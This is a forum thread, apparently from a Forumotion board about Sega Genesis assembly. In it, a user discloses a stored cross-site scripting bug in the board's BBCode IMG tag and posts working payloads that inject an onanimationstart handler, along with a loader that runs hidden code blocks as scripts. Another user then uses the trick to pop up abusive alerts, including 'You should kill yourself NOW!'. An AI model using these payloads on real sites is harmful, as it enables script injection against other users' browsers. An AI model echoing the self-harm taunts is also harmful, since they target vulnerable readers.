ASM to Sega Genesis Platform

Would you like to react to this message? Create an account in a few clicks or log in to continue.
ASM to Sega Genesis Platform

All about assembly programming in the Sega Genesis console.


2 posters

    Cross Site Scripting (XSS) with BBCode

    Ralakimus1
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.
    • Post n°1

    Cross Site Scripting (XSS) with BBCode Empty Cross Site Scripting (XSS) with BBCode

    Post  Ralakimus1 Fri Aug 13, 2021 11:02 pm

    So, IMG tags in BBCode fail to sanitize " and ' from the URL you insert into it. You can use this to insert additional attributes into the HTML IMG tag that it generates, which can then be used to execute Javascript code. I found it to work with the "onanimationstart" tag, since that doesn't get filtered out by the forums.

    Code:
    <style>@keyframes x{}</style>
    [img]&#34;onanimationstart=&#34;javascript:[INSERT CODE HERE]&#34; style="animation: x;&#34;[/img]

    Here, I create a blank animation in CSS called "x", and then set the onanimationstart attribute in the IMG tag, and also the style attribute that sets the animation to "x".

    It is important that quotes are stored as HTML character codes, single and double (&#39; and &#34;, respectively), or else it will not work.

    pls be safe with this
    • Back to top
    Ralakimus1
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.
    • Post n°2

    Cross Site Scripting (XSS) with BBCode Empty Re: Cross Site Scripting (XSS) with BBCode

    Post  Ralakimus1 Fri Aug 13, 2021 11:04 pm

    Forgot to change a " in the code box to a &#34;

    Code:
    <style>@keyframes x{}</style>
    [img]&#34;onanimationstart=&#34;javascript:[INSERT CODE HERE]&#34; style=&#34;animation: x;&#34;[/img]
    • Back to top
    Ralakimus1
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.
    • Post n°3

    Cross Site Scripting (XSS) with BBCode Empty Re: Cross Site Scripting (XSS) with BBCode

    Post  Ralakimus1 Fri Aug 13, 2021 11:06 pm


    • Back to top
    Ralakimus1
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.
    • Post n°4

    Cross Site Scripting (XSS) with BBCode Empty Re: Cross Site Scripting (XSS) with BBCode

    Post  Ralakimus1 Sat Aug 14, 2021 1:24 am


    • Back to top
    Jdpense
    Jdpense
    Jdpense


    Mensagens : 100564
    Data de inscrição : 2014-08-21
    • Post n°5

    Cross Site Scripting (XSS) with BBCode Empty Re: Cross Site Scripting (XSS) with BBCode

    Post  Jdpense Sat Aug 14, 2021 10:01 am

    Neato

    Smile
    • Back to top
    Ralakimus1
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.
    • Post n°6

    Cross Site Scripting (XSS) with BBCode Empty Re: Cross Site Scripting (XSS) with BBCode

    Post  Ralakimus1 Sat Aug 14, 2021 1:23 pm




    Created a script that clones "code" tags (with their class defined as "xss") as proper executable script tags.

    Just insert this in your page:
    Code:
    [img]&#34;onanimationstart=&#34;javascript:for&#40;let s of document.getElementsByClassName&#40;&#39;xss&#39;&#41;&#41;&#123; if&#40;s.nodeName==&#39;CODE&#39;&#41; &#123; var c=document.createElement&#40;&#39;script&#39;&#41;; c.type=&#39;text&#47;javascript&#39;; c.text=s.innerText; document.body.appendChild&#40;c&#41;; &#125;&#125;&#34; style=&#34;animation:xssanim;height:0;&#34;[/img]
    <style>@keyframes xssanim{} code.xss{display:none;height:0;}</style>

    And, now you can do stuff like this:
    Code:
    <code class="xss">
    alert("Easier XSS! Woo!");
    </code>


    alert("Easier XSS! Woo!");
    • Back to top
    Ralakimus1
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.
    • Post n°7

    Cross Site Scripting (XSS) with BBCode Empty Re: Cross Site Scripting (XSS) with BBCode

    Post  Ralakimus1 Sat Aug 14, 2021 1:26 pm

    This method is also far more reliable, since now whatever JS code is made no longer has to be in the IMG tag, which I found has the potential to mess with it, depending on what the code contains.
    • Back to top
    Jdpense
    Jdpense
    Jdpense


    Mensagens : 100564
    Data de inscrição : 2014-08-21
    • Post n°8

    Cross Site Scripting (XSS) with BBCode Empty Re: Cross Site Scripting (XSS) with BBCode

    Post  Jdpense Mon Jan 10, 2022 9:38 am

    BUMP!!!!!!

























    If only there was a way to remove flood control completely using this trick
    • Back to top
    Jdpense
    Jdpense
    Jdpense


    Mensagens : 100564
    Data de inscrição : 2014-08-21
    • Post n°9

    Cross Site Scripting (XSS) with BBCode Empty Re: Cross Site Scripting (XSS) with BBCode

    Post  Jdpense Mon Jan 10, 2022 9:42 am

    Cross Site Scripting (XSS) with BBCode &#34;onanimationstart=&#34;javascript:for&#40;let s of document.getElementsByClassName&#40;&#39;xss&#39;&#41;&#41;&#123; if&#40;s.nodeName==&#39;CODE&#39;&#41; &#123; var c=document.createElement&#40;&#39;script&#39;&#41;; c.type=&#39;text&#47;javascript&#39;; c.text=s.innerText; document.body


    alert("Your life is NOTHING!");

    What a Face
    • Back to top
    Jdpense
    Jdpense
    Jdpense


    Mensagens : 100564
    Data de inscrição : 2014-08-21
    • Post n°10

    Cross Site Scripting (XSS) with BBCode Empty Re: Cross Site Scripting (XSS) with BBCode

    Post  Jdpense Mon Jan 10, 2022 9:43 am

    Cross Site Scripting (XSS) with BBCode &#34;onanimationstart=&#34;javascript:for&#40;let s of document.getElementsByClassName&#40;&#39;xss&#39;&#41;&#41;&#123; if&#40;s.nodeName==&#39;CODE&#39;&#41; &#123; var c=document.createElement&#40;&#39;script&#39;&#41;; c.type=&#39;text&#47;javascript&#39;; c.text=s.innerText; document.body


    alert("Your life you have ZERO purpose!");
    alert("You should kill yourself NOW!");

    • Back to top
    Sponsored content

    Sponsored content


    • Post n°11

    Cross Site Scripting (XSS) with BBCode Empty Re: Cross Site Scripting (XSS) with BBCode

    Post  Sponsored content

    • Back to top
      Current date/time is Fri May 17, 2024 12:24 am